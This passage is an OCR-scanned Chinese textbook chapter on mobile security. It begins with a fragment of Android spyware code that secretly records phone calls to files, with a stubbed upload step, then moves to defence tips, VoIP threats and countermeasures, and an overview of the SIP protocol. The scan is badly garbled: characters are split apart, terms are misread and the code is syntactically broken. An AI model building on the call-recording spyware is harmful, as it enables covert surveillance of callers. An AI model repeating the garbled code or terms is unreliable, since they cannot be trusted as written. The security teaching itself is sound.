recorder.setAudioEncoder(MediaRecorder.AudioEncoder.AMR_NB);// 音 频 编码 方式 
audioFile = new File(getCacheDir(), incomingNumber + "_" + System.currentTime 


Millis() + ".3gp"); 


recorder.setOutputFile(audioFile.getAbsolutePath()); 
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recorder.prepare(); /预期 准备 
recorder.start(); /开始 刻录 
record = true; 
Log.i(TAG, "start record"); 
break; 

case TelephonyManager.CALL STATE RINGING: // 电 话 进来 时 
mobile = incomingNumber; 
Log.i(TAG, incomingNumber + " coming"); 
break; 

default: 
break; 


} 
)catch (Exception e){ 
e.printStackTrace(); 


} 
super.onCallStateChanged(state, incomingNumber); 


} 
private final class UploadTask implements Runnable{ 


@Override 
public void run() { 
/上 传 文件 操作 
} 
} 
@Override 


public IBinder onBind(Intent intent) { 
II TODO Auto-generated method stub 
return null; 


} 


} 

上 述 具 有 监听 功能 的 恶意 软件 在 安装 后 不 会 在 前 台 显 示 任 何 标识 ， 所 有 操作 都 是 在 后 台 默 默 进行 的 ， 
并 且 以 后 台 联 网 的 形式 上 传 截取 的 隐私 内 容 。 这 样 造成 的 严重 后 果 是 ， 用 户 在 不 安装 手机 安全 软件 的 情况 
下 很 难 发 现 其 恶意 行为 ， 并 且 很 难 对 其 进行 快速 清除 。 对 于 使 用 者 来 说 ， 为 了 消灭 上 述 危 机 ， 可 以 从 如 下 
两 个 方面 着 手 。 

СТ) 提升 安全 意识 ， 不 要 轻易 将 手机 借 给 他 人 。 当 获得 新 手机 时 要 及 时 安装 一 款 专业 的 手机 安全 软件 
来 检测 手机 中 是 否 存在 窃取 隐私 的 程序 ， 避 免 被 植 入 手机 病毒 及 间谍 软件 。 

(2) 不 要 言 目 打开 短信 中 的 网 站 链接 ， 避 免 被 远程 植 入 可 窃取 用 户 隐私 的 间谍 软件 ， 同 时 启动 手机 中 
的 安全 软件 以 实时 防 控 功能 ， 阻 止 恶意 程序 通过 各 种 途径 植 入 。 


7.3.2 VoIP 语音 编码 和 安全 性 分 析 


1. VolP 技术 介绍 

VoIP 技术 是 Voice over IP 的 简称 ， 也 就 是 IP 语音 技术 。 其 原理 是 传送 IP 包 来 实现 语音 业务 。 首 先 在 
发 送 端 对 模拟 语音 信号 进行 采样 、 量 化 、 压 缩编 码 ， 然 后 将 语音 数据 封装 成 IP 包 ， 通过 IP 网 络 发 送 到 接收 
端 ， 再 进行 解 包 和 解压 缩 ， 还 原 模 拟 信号 ， 以 实现 语音 通信 。VolP 技术 的 出 现 ， 使 语音 业务 在 数据 网 上 实 
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现 连 续 而 高 效 地 传输 成 为 可 能 。 它 提供 了 一 种 强大 而 又 经 济 的 通信 手段 ， 能 更 合理 地 利用 网 络 资源 ， 降 低 
了 语音 业务 成 本 ， 因 此 在 全 球 范围 内 得 到 了 迅速 的 发 展 。 

IP 电话 与 传统 电话 的 主要 区 别 是 传输 媒介 和 交换 方式 。IP 电话 利用 Internet 进行 传输 , 而 传统 电话 则 使 
用 公共 交换 电话 网 络 (PSTN) ; IP 电话 的 交换 方式 是 分 组 交换 ， 而 传统 电话 则 使 用 电路 交换 。 分 组 交换 技 
术 使 得 IP 电话 在 有 信息 时 才 传送 数据 ， 无 信息 时 不 传输 数据 ， 并 且 在 使 用 压缩 技术 后 ， 能 使 用 远 低 于 传统 
电话 所 需 的 网 络 带宽 来 实现 传输 ， 传 统 电话 技术 通常 需要 64kbits 以 上 的 带宽 ， 而 分 组 诸 音 需 要 的 带宽 往往 
不 到 10kbit/s. IP 电话 都 是 智能 终端 ，IP 网 络 也 是 开放 式 网 络 ， 因 此 很 容易 快速 推出 新 业务 ， 而 PSTN 结构 
复杂 、 设 备 固定 ， 因 而 补充 新 业务 复杂 。 

鉴于 VoIP 的 诸多 优势 ， 越 来 越 多 的 个 人 、 公 司 和 科研 机 构 开始 发 展 和 完善 VoIP 技术 及 相应 标准 。 其 
中 ， 最 有 影响 力 的 两 个 组 织 为 国际 电 联 电信 分 会 (ITU-T) 和 Internet 工程 任务 组 CIETF) ， 这 两 个 组 织 制 
定 了 不 同 的 VoIP 协议 标准 。 目 前 在 VoIP 中 使 用 较 多 的 是 音 视 频 协 议 H.323、 信 令 控 制 协议 SIP 及 媒体 网 关 
控制 协议 MGCP 这 3 种 主流 协议 。 

在 VoIP 技术 中 包含 了 如 下 关键 技术 。 

(1) 语音 编码 压缩 技术 

IP 电话 中 的 语音 处 理 主要 解决 在 IP 网 络 环境 中 , 在 保证 语音 质量 的 前 提 下 , 尽 可 能 地 降低 编码 比特 率 ， 
这 就 是 语音 压缩 编码 技术 。 本 文 VoIP 客户 端 软件 的 安全 性 设计 并 未 涉及 语音 编码 压缩 技术 ， 直 接 利 用 了 开 
源 协议 栈 的 代码 实现 。 

(2) 信 令 技术 

在 IP 电话 中 ， 仅 仅 利用 语音 编码 来 保证 语音 质量 是 不 够 的 ， 这 也 并 非 VoIP 技术 的 难点 。 关 键 是 分 组 
语音 应 用 要 求 某 地 的 呼叫 者 连接 至 同样 使 用 其 拨号 标准 的 语音 代理 ， 并 将 呼叫 转发 到 可 以 访问 其 他 语音 代 
理 的 用 户 组 , 这 就 需要 信 令 技术 -项 鉴别 呼叫 方 所 要 呼叫 的 对 象 和 定位 呼叫 方 在 网 络 中 的 位 置 的 技术 。 
信 令 技术 被 用 以 创建 、 修 改 和 结束 一 个 或 多 个 参与 者 参加 的 会 话 进程 ， 其 目的 是 实现 一 个 完整 的 呼叫 过 程 。 
在 分 组 语音 网 络 中 的 信 令 有 两 种 。 一 种 是 外 部 信 令 ， 存 在 于 普通 语音 网 络 中 的 语音 代理 和 该 代理 服务 的 语 
音 设 备 ， 遵 循 电话 标准 。 另 一 种 信 令 在 语音 代理 之 间 传 输 ， 称 为 内 部 信 令 。 这 种 内 部 信 令 通过 传输 网 络 标 
准 或 语音 代理 本 身 的 标准 实现 。 

内 部 信 令 提供 了 连接 控制 和 呼叫 处 理 ( 或 状态 信息 〉 两 种 功能 。 连 接 控 制 信 令 用 于 建立 语音 代理 之 间 
传输 语音 分 组 的 联系 或 通道 。 呼 叫 处 理 (或 状态 信息 ) 信 令 在 语音 代理 之 间 发 送 呼叫 状态 ， 如 振 铃 、 忙 音 
等 。 在 分 组 语音 网 络 的 传输 模式 中 ， 内 部 信 令 最 初 是 用 于 避免 在 网 络 中 维持 用 来 支持 所 有 可 能 呼叫 的 永久 
连接 ， 这 样 ， 该 传输 模式 中 的 内 部 信 令 就 隶属 于 分 配 带宽 固定 的 连接 网 络 。 对 无 连接 网 络 中 的 分 组 语音 应 
用 而 言 ， 永 久 连 接 并 不 存在 ， 进 行 语音 业务 时 双方 的 语音 代理 只 需要 彼此 定位 。 

在 分 组 语音 网 络 的 转换 模式 中 ， 信 令 的 作用 是 通过 拨号 规则 判断 目标 代理 是 否 存 在 ， 如 果 存 在 就 将 分 
组 流 发 送 至 该 代理 。 但 网 络 中 往往 存在 多 种 语音 代理 ， 连 接种 类 的 多 样 性 使 得 语音 代理 无 法 为 每 个 语音 业 
务 建立 通道 。 单 独 的 传输 网 络 方案 ， 如 ATM, Wi ARAN IP 都 拥有 独立 的 信用 标准 。ATM 的 标准 为 Q.931, 
帧 中 继 分 组 语音 信 令 为 FRF.11。 这 些 标准 规定 用 户 在 不 同 的 传输 网 络 使 用 相对 应 的 特殊 分 组 语音 代理 。 

在 人 P 分 组 语音 网 络 中 采用 的 内 部 信 令 (包括 连接 和 呼叫 处 理 ) 标准 主要 有 两 种 , BI ITU-T 提出 的 H.323 
协议 和 ТЕТЕ 制订 的 SIP 协议 。 


2. VolP 安全 性 分 析 


在 实现 VoIP 通信 过 程 中 , 通常 在 实现 SIPDroid 系统 诸 音 通信 的 基础 上 , 需要 先 实现 对 通话 诸 音 编码 数 
据 的 КСА 加 密 处 理 后 再 进行 传输 , 这 样 安全 性 是 建立 在 КСА 加 密 算法 无 法 被 攻击 成 功 和 通话 双方 密 钥 保存 
安全 的 前 提 下 。 这 样 从 整个 Android 应 用 层 来 看 ， 权 限 控制 也 是 实现 语音 通信 安全 很 重要 的 一 方面 ， 假 如 另 
- 款 系统 也 拥有 得 到 用 户 通信 诸 音 数据 的 权限 ， 那 么 用 户 的 诸 音 通话 安全 依旧 存在 风险 。 
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虽然 在 软件 的 设计 上 ， 加 入 了 让 用 户 选 择 设置 使 用 SIPDroid 还 是 Android 系统 自 带 服务 来 进行 语音 通 
信 的 模块 与 界面 ， 但 是 这 样 还 是 没有 从 Android 广播 机 制 来 实现 对 语音 数据 的 控制 。 

对 于 日 渐 得 到 认可 的 VoIP 来 说 ， 显 然 它 面临 的 安全 性 挑战 相当 多 样 ， 应 对 的 手段 也 不 仅 限于 加 密 。 在 
当前 市 场 发 展 前 景 下 ，VoIP 存在 的 安全 漏洞 和 面临 的 威胁 主要 有 以 下 几 种 。 

A) VoIP 产品 本 身 存在 一 定 的 安全 漏洞 

目前 VoIP 各 厂家 都 有 独立 的 语音 服务 器 产品 ， 而 且 往 往 基 于 不 同 的 操作 系统 开发 。 主 流 操作 系统 都 不 
同 程度 地 存在 安全 漏洞 ， 并 且 无 法 保证 这 些 产品 是 否 已 经 弥补 了 安全 漏洞 。 

(2) DoS 攻击 问题 

VoIP 系统 实现 业务 传输 以 及 系统 管理 需要 很 多 端口 ， 如 果 开 放 这 些 端口 而 又 不 加 强 呼叫 建立 的 认证 协 
议 ， 就 为 DoS 攻击 提供 了 可 能 。SIP 协议 和 H.323 协议 都 采用 RTP，H.323 会 话 可 能 使 用 7 一 11 个 端口 号 ， 
其 中 只 有 两 个 为 静态 的 ，SIP 至 少 使 用 3 个 端口 号 ， 其 中 只 有 一 个 为 静态 的 。 然 而 ， 由 于 VoIP 会 话 同时 支 
FË TCP 和 UDP， 这些 协议 可 以 从 防火 墙 的 内 部 或 者 外 部 启动 ， 而 且 标准 防火 墙 的 配置 是 所 有 可 能 使 用 的 潜 
在 应 用 端口 都 是 打开 的 。 因 此 对 于 VoIP 应 用 来 说 ， 就 意味 着 会 打开 大 量 端口 ， 从 而 产生 了 大 量 安 全 漏洞 。 

(3) VoIP 的 很 多 协议 本 身 也 存在 着 安全 漏洞 

默认 状态 下 的 SIP 消息 采用 未 加 密 的 明文 格式 传输 ,容易 受 到 截获 、 自 改 和 窃听 攻击 。 基 于 H.323、SIP 
的 VoIP 都 可 由 RTP 来 承载 。 而 这 种 协议 导致 很 多 关键 信息 ， 如 起 始 和 目的 地 址 容易 被 截获 及 算 改 。 如 果 
RTP 会 话 未 经 加 密 ， 那 么 用 户 的 身份 信息 或 者 会 话 内 容 会 被 窃取 、 算 改 或 窍 听 。 

(4) 监听 语音 

由 于 VoIP 数据 在 数据 网 络 上 传输 , 所 以 , 与 PSTN 等 电路 交换 模式 的 通信 网 相 比 更 容易 遭受 窃听 攻击 ， 
常用 窃听 工具 ， 如 TCPDUMP、SNIFFER 等 ， 通 过 侦 听 就 有 可 能 得 到 语音 通信 的 内 容 。 对 于 开放 协议 来 说 ， 
小段 媒体 流 的 重 放 不 需要 前 后 信息 的 关联 。 如 果 有 人 窃听 记录 所 有 信息 并 加 以 重 放 ， 将 严重 影响 通信 内 
容 的 安全 。 

(5) 对 VoIP 服务 的 盗用 

尽管 IP 电话 机 无 法 并 线 ， 但 通过 IP 网 络 窃听 方式 窃取 登录 密码 同样 能 够 获得 话机 的 权限 。 窃 取 用 户 账 
户 与 密码 信息 后 ， 攻 击 者 可 冒充 用 户 身份 进行 大 量 诸 音 通 话 ， 使 其 蒙受 高 额 话费 损失 。 同 时 ， 攻 击 者 还 能 
够 向 特定 终端 发 送 SIP 控制 包 ， 将 用 户 当前 的 语音 呼叫 重 定位 至 不 同 的 设备 ， 使 用 户 无 法 与 呼叫 目标 通话 。 

(6) 对 通话 双方 话音 实时 内 容 的 恶意 算 改 

基于 IP 话音 数据 的 分 组 特性 ， 只 要 跟踪 并 锁定 通过 H.323 或 SIP 建立 呼叫 的 双方 ， 就 能 故意 在 通话 过 
程 中 实时 加 入 恶意 话音 数据 而 导致 沟通 双方 产生 误解 ， 实 现 攻击 目的 。 

(7) 对 数据 网 络 的 安全 威胁 

随 着 VoIP 的 逐步 普及 ， 以 TCP/IP 协议 栈 为 基础 的 IP 语音 设备 ,如 各 种 ТІР 语音 终端 和 服务 器 ,也 面临 
着 病毒 、 蠕虫 和 木马 程序 的 攻击 。 病毒 不 但 会 严重 降低 VoIP 业务 的 性 能 ， 甚 至 会 传播 到 数据 网 络 的 服务 器 ， 
使 数据 网 络 遭 到 破坏 。 


3. 解决 方案 


针对 前 面 介绍 的 安全 威胁 ， 可 以 通过 如 下 方案 解决 VoIP 的 安全 机 制 问题 。 

CD 选择 合适 的 VoIP 设备 并 及 时 加 强 软 硬件 的 安全 升级 

尽管 不 同 厂家 的 VoIP 产品 体系 构架 和 操作 平台 不 尽 相同 ， 但 很 多 还 是 有 相应 的 技术 来 保障 其 产品 抵御 
病毒 侵袭 的 能 力 。 例 如 ， 管 理 网 段 和 用 户 的 IP. 话音 网 段 在 物理 上 隔离 的 机 制 ， 尽 可 能 少 地 将 端口 暴露 在 外 
网 上 。 
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(2) 利用 各 种 相关 协议 安全 性 机 制 提高 VoIP 的 安全 

不 断 完 善 加 强 VoIP 相关 协议 的 安全 性 机 制 是 保障 VoIP 网 络 安全 的 根本 。VoIP 可 采取 两 种 方法 通过 其 
相关 协议 安全 机 制 加 强 其 安全 性 。 一 是 在 VoIP 协议 的 内 部 建立 安全 机 制 ， 即 制定 其 自身 完善 的 安全 协议 ， 
如 H.323 协议 的 H.235 安全 协议 .二 是 采用 外 部 协议 的 安全 机 制 ,如 采用 传输 层 安全 (TLS)、IP 安全 性 (IPSec) 
等 安全 协议 。 

(3) 利用 VPN 技术 增强 VoIP 的 安全 性 

- 般 来 说 ， 防 火 墙 、 加 密 是 信息 安全 最 行 之 有 效 的 方法 。 虚 拟 专 网 VPN) 技术 综合 了 两 者 优点 ,在 
IP 网 和 VoIP 网 关 之 间 添 加 网 关 型 VPN 或 在 IP 网 和 移动 主机 间 设 置 主机 型 VPN 来 增强 VoIP 的 安全 性 。 

VPN 是 利用 开放 性 网 络 作为 信息 传输 的 媒体 ， 通 过 加 密 、 认 证 、 封 装 以 及 密 钥 交换 技术 在 公 网 上 开辟 
-条 隧道 ， 保 证 合法 用 户 之 间 的 安全 通信 。 利 用 VPN 的 安全 机 制 来 保证 VoIP 的 安全 ， 不 但 可 为 用 户 提供 
安全 的 语音 服务 ， 还 可 充分 利用 网 络 设施 ， 降 低 营 运 成 本 。 

VPN 的 安全 机 制 是 通过 隧道 技术 来 实现 的 。 利 用 隧道 技术 ， 将 待 传输 的 原始 信息 进行 加 密 和 协议 封装 
处 理 ， 经 过 (PPTP, L2TP Bk IPSec) 封装 后 的 数据 包 ， 只 有 源 端 和 目的 端的 用 户 能 够 对 隧道 中 的 嵌 套 信息 
进行 解释 和 处 理 ， 对 其 他 用 户 是 毫 无 意义 的 ， 从 而 加 强 了 信息 的 安全 性 。 

(4) 将 VoIP 网 络 和 数据 传输 网 络 隔离 

将 VoIP 终端 集中 到 一 个 独立 的 虚拟 局 域 网 (VLAN) 中 ， 同 时 对 进入 该 网 段 的 无 关 PC 终端 进行 限制 ， 
把 VoIP 终端 的 IP 地 址 与 其 媒体 访问 控制 (MAC) 地 址 绑 定 ， 同 时 配合 VLAN 划分 ， 实 现 IP 语音 设备 和 数 
据 网 在 逻辑 上 的 隔离 ， 从 而 起 到 隔离 病毒 和 防止 攻击 的 目的 。 


7.3.3 SIP 协议 控制 


SIP (Session Initiation Protocol， 信 令 控 制 协议 ) 是 由 IETF 提出 的 会 话 控制 协议 ， 负 责 建 立 和 管理 两 个 
或 多 个 用 户 间 的 会 话 连接 ， 是 ТЕТЕ 多 媒体 数据 和 控制 体系 中 的 核心 协议 。SIP 借鉴 了 超 文 本 传输 协议 
(HTTP) 、 简 单 邮 件 传输 协议 (SMTP) 这 两 个 互联 网 最 成 功 的 应 用 层 协议 ， 具 有 简单 、 开 放 、 灵 活 的 特点 。 

SIP 协议 可 用 来 创建 、 修 改 以 及 终结 多 个 参与 者 参加 的 多 媒体 会 话 进程 ， 会 话 成 员 可 以 使 用 组 播 、 单 
播 或 者 两 者 结合 的 形式 进行 通信 ， 同 时 也 支持 重 定向 服务 , 便于 实现 综合 业务 数字 网 、 智 能 网 和 个 人 移动 
业务 。 

(1) SIP 起 源 与 发 展 

SIP 最 早 是 由 Henning Schulzrinne 和 Mark Handley 于 1996 年 设计 ， 当 初 设计 的 目标 之 一 是 实现 类 似 
PSTN 中 提供 呼叫 处 理 功能 的 扩展 集 ， 来 完成 类 似 普 通电 话 的 各 种 操作 : 拨号 、 振 铃 、 回 铃 音 等 。 随 着 网 络 
技术 的 发 展 ， 如 今 SIP 已 被 用 来 提供 跨越 internet 的 高 级 电话 业务 。IP 电话 正在 演变 为 一 种 正式 的 商业 电话 
模式 ，SIP 协议 就 是 支持 这 种 演进 的 协议 艇 中 重要 的 一 员 。 


SIP 的 发 展 大 致 可 分 为 4 个 阶段 。 
口 1996 年 ，SIP 的 概念 首先 被 提出 ， 但 只 能 处 理会 话 的 建立 ， 用 户 一 旦 加 入 会 话 ， 信 令 就 会 终止 ， 因 
此 也 无 法 实现 对 会 话 的 中 间 控 制 。 


口 1999 年 3 月 ，IETF 的 多 方 多 媒体 会 晤 控制 工作 组 (mmusic) 提出 了 RFC2543 建 议 。 

Q 2000 年 7 月， 已 经 从 mmusic 中 分 离 出 来 的 SP 工作 组 发 表 了 SIP 的 草案 。 

Q 2002 年 6 月 ，IETF 的 SIP 工 作 组 又 发 表 了 RFC3261 建 议 ， 取 代 了 RFC2543。 

从 SIP 的 发 展 来 看 ,协议 首次 被 提出 时 ， 受 限于 当时 的 网 络 环境 及 多 媒体 技术 的 不 足 ， 协 议 仅仅 针对 文 
本 应 用 。 随 着 技术 的 发 展 ， 并 通过 和 ETF 中 其 他 工作 组 ， 如 IP 电话 工作 组 (iptel) IP 网 中 电话 选 路 工作 
组 Crip) 等 的 配合 ， 在 SIP 协议 中 大 大 加 强 了 对 多 媒体 通信 的 支持 。 而 3GPP 使 用 了 SIP 标准 来 支持 语音 
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和 数据 ，SIP 协议 得 到 了 进一步 的 发 展 。SIP 可 以 对 语音 进行 很 好 的 优化 ， 并 且 由 于 它 的 可 编译 性 ， 使 移动 
业务 能 更 好 地 面 对 灵 活性 和 多 样 性 的 挑战 。 

(2) SIP 协议 功能 

SIP 在 建立 和 维持 终止 多 媒体 会 话 协议 上 ， 支 持 如 下 5 个 方面 的 功能 。 


ooooo 


用 户 定位 : 检测 终端 用 户 的 位 置 ， 用 于 通信 。 
AMPAR: 鉴定 用 户 参 与 会 话 的 意愿 。 

用 户 能 力 : 检查 媒体 的 参数 。 

建立 会 话 : 建立 会 话 ， 参 数 在 呼叫 方 和 被 叫 方 。 

会 话 管理 : 包括 发 起 和 终止 会 话 、 修 改 会 话 参数 、 激 活 服务 等 。 


SIP 本 身 并 不 提供 服务 ， 却 可 以 和 其 他 IETF 协议 一 起 工作 ， 来 提供 完整 的 对 终端 用 户 的 服务 和 构造 完 
整 的 多 媒体 架构 。 但 是 基本 的 SP 协议 的 功能 组 件 并 不 依赖 于 这 些 协议 。 安 全 对 于 提供 的 服务 来 说 特别 重要 。 
要 达到 理想 的 安全 程度 ，SIP 提供 了 一 套 安全 服务 ， 包 括 防止 拒绝 服务 、 认 证 服务 〈 用 户 到 用 户 ， 代 理 到 用 
户 ) 、 完 整 性 保证 、 加 密 和 隐私 服务 。SIP 可 以 基于 IPV4 也 可 以 基于 IPV6。 

(3) SIP 基本 原理 分 析 

SIP 定义 的 要 素 是 凶 辑 上 的 要 素 ， 不 是 物理 要 素 。 一 个 物理 的 实现 可 以 包含 不 同 的 逻辑 要 素 。 按 照 罗 辑 


功能 分 ， 
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SIP 系统 由 5 种 要 素 组 成 : 用 户 代理 客户 机 、 用 户 代 理 服务 器 、 代 理 、 重 定向 服务 器 及 注册 服务 器 。 
用 户 代理 客户 机 (User Agent Client, UAC) : 用 来 发 起 SIP 请 求 的 客户 程序 。 

用 户 代理 服务 器 (User Agent Server, UAS) : 收 到 SIP 请 求 后 负责 与 用 户 联系 并 代表 用 户 回 送 响应 
的 服务 程序 。 该 响应 可 以 表示 接受 、 拒 绝 或 重 定向 请 求 消息 。 一 般 与 UAC 一 起 组 成 用 户 代理 存在 
于 用 户 终端 中 。 

代理 (Proxy) : 既 充 当 服务 器 又 充当 客户 机 的 媒介 程序 ， 是 SIP 系 统 中 最 重要 的 网 络 功能 实体 ， 主 
要 提供 路 由 功能 。 用 户 的 SP 请 求 和 响应 可 以 直接 被 代理 服务 器 处 理 或 遵循 相应 网 络 策略 转发 给 对 
应 的 服务 器 ， 并 根据 收 到 的 应 答对 用 户 做 出 响应 。 代 理 服务 器 在 转发 之 前 要 对 消息 进行 解析 ， 必 要 
时 还 会 改写 请 求 。 代 理 服务 器 分 为 有 状态 CStateful) 和 无 状态 (Stateless) 两 种 类 型 ， 二 者 的 区 别 
是 有 状态 代理 服务 器 会 记 住 接收 的 入 请 求 、 回 送 的 响应 以 及 转送 的 出 请 求 , 无 状态 代理 服务 器 一 旦 
转发 请 求 后 就 忘记 所 有 的 信息 。 无 状态 代理 服务 器 位 于 网 络 核心 ， 处 理 大 量 请 求 ， 负 责 重 定向 等 工 
fE, 不 必 追 踪 记录 一 个 会 话 的 全 过 程 。 而 位 于 网 络 边缘 的 有 状态 代理 服务 器 ， 处 理 局 部 有 限 数量 的 
用 户 呼叫 ,负责 对 每 个 会 话 进行 管理 和 计 费 , 需要 追踪 一 个 会 话 的 全 过 程 。 无 状态 代理 服务 器 是 SIP 
结构 的 骨干 ， 处 理 速度 最 快 。 有 状态 代理 服务 器 是 离 用 户 代理 最 近 的 本 地 设备 ， 控 制 用 户 域 并 且 是 
应 用 服务 的 主要 平台 。 

重 定向 服务 器 (Redirect Server) : 是 实现 呼叫 重 定向 的 逻辑 实体 。 它 接收 用 户 代理 的 SIP 呼 叫 请 求 ， 
通过 服务 器 中 配置 的 策略 和 对 定位 服务 器 的 查询 将 其 地 址 映射 成 新 地 址 返回 给 用 户 , 以 指示 用 户 代 
理 将 呼叫 重 定向 到 其 他 目的 地 , 来 实现 对 呼叫 的 灵活 控制 。 与 代理 服务 器 不 同 , 它 不 发 出 自己 的 SIP 
请 求 ， 与 用 户 助理 服务 器 不 同 ， 它 不 接受 呼叫 。 

注册 服务 器 (Registrar) : 是 完成 用 户 代 理 注 册 / 注 销 功 能 的 逻辑 实体 。 它 接收 其 管辖 范围 内 的 用 户 
代理 的 注册 请 求 ， 将 用 户 代 理 的 地 址 信息 添加 到 定位 服务 器 中 ,完成 用 户 地 址 的 注册 。 常 与 代理 或 
重 定向 服务 器 在 同一 位 置 ， 可 以 提供 定位 服务 。 


由 此 可 以 看 出 ,用 户 终端 程序 往往 需要 包括 UAC 和 UAS， 而 代理 服务 器 、 重 定向 服务 器 和 注册 服务 器 
可 以 看 成 是 公众 性 的 网 络 服务 器 。 值 得 注意 的 是 , 在 SP 中 还 经 常 提 到 定位 服务 的 概念 。 但 SIP 协议 不 规定 
SIP 服务 器 如 何 请 求 定位 服务 ， 定 位 服务 器 也 不 属于 SIP 服务 。 

定位 服务 (Location Service) : SIP 重 定位 服务 器 或 代理 服务 器 用 来 获得 被 叫 位 置 的 一 种 服务 ， 可 由 定 
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位 服务 器 提供 。 
(4) SIP 协议 结构 
从 网 络 分 层 结构 看 ，SIP 处 于 网 络 传输 层 之 上 。SIP 本 身 又 由 若干 层 组 成 ， 从 下 到 上 分 别 是 传输 层 、 事 
务 层 以 及 事务 用 户 层 ， 如 图 7-5 所 示 。 


о 传输 层 : 定义 了 一 个 客户 端 如 何 发 送 请 求 和 接收 应 答 ， 以 及 一 个 服务 器 SIP 
如 何 接收 请 求 和 发 送 应 答 。 所 有 的 SIP 要 素 都 包含 传输 层 。 事务 用 户 层 

Па 事务 层 : 事务 是 SIP 的 基本 组 成 部 分 。 一 个 事务 指 的 是 从 客户 机 发 送 请 求 事务 层 
到 一 个 服务 器 开始 ， 直 到 服务 器 的 所 有 对 该 请 求 的 应 答 发 送 回 客户 端 为 传输 层 
止 的 整个 过 程 。 事 务 层 处 理应 用 层 的 重 发 ， 匹 配 请 求 的 应 答 ， 以 及 应 用 UDP/TCP 
服务 层 的 超时 。 任 何 一 个 用 户 代 理 完成 的 事情 都 是 由 一 组 事务 构成 的 。 IP 
事务 层 包含 客户 机 元 素 和 服务 器 元 素 。 用 户 代理 和 有 状态 代理 服务 器 均 链 路 层 
包含 一 个 事务 层 ， 无 状态 代理 服务 器 则 不 包含 事务 层 。 物理 层 


a 事务 用 户 层 : 每 个 SP 实体 都 是 -个 事务 用 户 。 当 事务 用 户 发 出 -个 请 求 ， 图 7.5 SIP 的 分 层 结构 
该 层 首先 创建 一 个 客户 事务 实例 和 请 求 一 起 发 送 ， 包 括 目 标 IP 地 址 、 端 
口号 以 及 发 送 请 求 的 设备 。 事 务 用 户 既 能 创建 事务 ， 也 能 取消 事务 。 当 客户 机 取消 一 个 事务 ， 就 请 
求 服务 器 终止 正在 处 理 的 事务 ， 回 滚 到 该 事务 开始 前 状态 ， 并 产生 该 事务 的 错误 报告 。 这 是 由 
CANCEL 请 求 〈 将 在 后 文 提 到 ) 完成 的 ， 这 个 请 求 有 自己 的 事务 ， 并 且 包 含 一 个 被 取消 的 事务 。 
将 SIP 作为 一 个 分 层 协议 来 描述 ， 只 是 为 了 能 够 更 清晰 地 表达 ， 各 层次 之 间 只 有 松散 的 关系 ， 并 没有 规 
定 一 个 具体 的 实现 。 因 此 一 个 要 素 “包含 ” 某 一 个 层 ， 指 的 是 这 个 要 素 要 符合 这 个 层 定义 的 规则 ， 而 非 每 
个 要 素 都 一 定 包含 每 一 个 层 。 
(5) SIP 的 用 户 定位 功能 
SIP 通过 E-mail 地 址 形式 来 标明 用 户 地 址 。 一 个 终端 用 户 通过 一 个 唯一 的 URL 来 标识 自己 的 身份 。SIP 
URL 用 于 SIP 消息 中 ， 包 括 请 求 的 发 起 者 СЕтот) 、 当 前 目的 地 (RequestURI) 和 最 终 接收 者 (To) 以 及 
指定 重 定向 地 址 (Contact) „ SIP URL 也 可 以 嵌入 WEB 页 面 或 其 他 超 链 接 表示 某 个 用 户 或 服务 可 以 使 用 
SIP 服务 器 访问 。 此 外 ，SIP 在 设计 上 也 充分 考虑 了 对 其 他 协议 的 可 兼容 性 。 它 支持 多 种 寻 址 地 址 描述 ， 例 
如 ， 用 户 名 @ 主 机 地 址 、 被 叫 号 码 @PSTN 网 关 地 址 、 普 通电 话 的 描述 等 。 这 样 ，SIP 主 叫 根据 被 叫 地 址 就 
可 以 标识 出 被 叫 在 普通 电话 网 上 的 位 置 ， 然 后 利用 与 普通 电话 网 相连 的 网 关 建 立 连 接 。SIP 最 强大 之 处 就 是 
用 户 定位 功能 。SIP 本 身 包含 向 注册 服务 器 注册 的 功能 ， 同 时 也 可 以 使 用 其 他 定位 服务 器 , 例如 ，DNS 提供 
的 定位 服务 来 增强 其 定位 功能 。 
(6) SIP 消息 机 制 
SIP 对 会 话 的 管理 主要 是 通过 其 消息 机 制 实现 的 ， 通 信 双 方 可 通过 消息 的 交换 实现 会 话 控制 。SIP 消息 
机 制 有 两 种 : 客户 机 到 服务 器 的 请 求 Request) 和 服务 器 到 客户 机 的 响应 (Response) . SIP 的 核心 通信 机 
制 就 是 请 求 响应 。 SIP 消息 采用 文本 方式 编码 ， 尽 管 两 种 类 型 消息 在 语法 细节 上 不 同 ， 但 是 两 种 类 型 消息 
都 是 由 一 个 起 始 行 、 若 干 个 字 头 段 、 一 个 空 行 〈 用 于 标志 字 头 段 结束 ) 以 及 一 个 可 选 消息 体 组 成 。 起 始 行 、 
每 个 消息 头 行 和 空 行 都 必须 以 回 车 换行 序列 (CRLF) 终止 。 值 得 注意 的 是 即使 没有 消息 体 ， 也 必须 有 空 行 。 
О SIP 请 求 消息 以 Request-Line 为 起 始 行 ， 以 此 区 别 于 其 他 消息 。Request-Line 包 括 方法 名 、Request-URI 以 
及 由 空格 分 开 的 协议 版 本 号 。Request-Line 同 样 以 CRLF 结 束 。RFC3261 规 范 一 共 定义 了 6 种 请 求 方法 。 
口 INVITE 请 求 消息 用 于 邀请 用 户 加 入 一 个 呼叫 。INVITE 消 息 中 有 一 种 消息 体 称 为 消息 描述 符 ， 描 述 符 
符合 SDP 协 议 标准 。 消 息 体 包括 会 话 名 称 和 意图 、 会 话 持续 时 间 、 会 话 媒 体 、 接 收 媒体 信息 等 内 容 。 
О ACK 请 求 消息 用 于 对 请 求 消息 的 响应 消息 进行 确认 , 也 可 以 包含 消息 体 。 ACK 请 求 与 INVITE 捆 绑 
使 用 ， 当 INVITE 请 求 被 最 终 应 答 时 ，ACK 消 息 就 会 被 发 出 ， 表 示 主 叫 方 接受 对 方 应 答 。 
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0 OPTIONS 请 求 消息 用 于 查询 代理 服务 器 支持 的 方法 和 会 话 描述 协议 。 

O BYE 请 求 消息 用 于 释放 已 建立 的 呼叫 。 主 叫 方 与 被 叫 方 都 可 以 发 送 , 等 同 于 普通 电话 通信 中 的 挂机 
操作 。 

O CANCEL 请 求 消息 用 于 释放 尚未 建立 的 呼叫 。CANCEL 请 求 必须 与 被 取消 的 消息 具有 相同 的 
CALL-ID、FROM、TO、Cseq 标 题字 段 。 

O REGISTER 请 求 消息 用 于 在 SIP 网 络 服 务 器 上 登记 用 户 的 位 置信 息 。UAC 可 以 通过 发 送 REGISTER 
请 求 ， 将 自己 的 SIP 地 址 信息 登记 到 注册 服务 器 中 。UAC 组 播 REGISTER 请 求 ， 接 收 到 此 请 求 的 注 
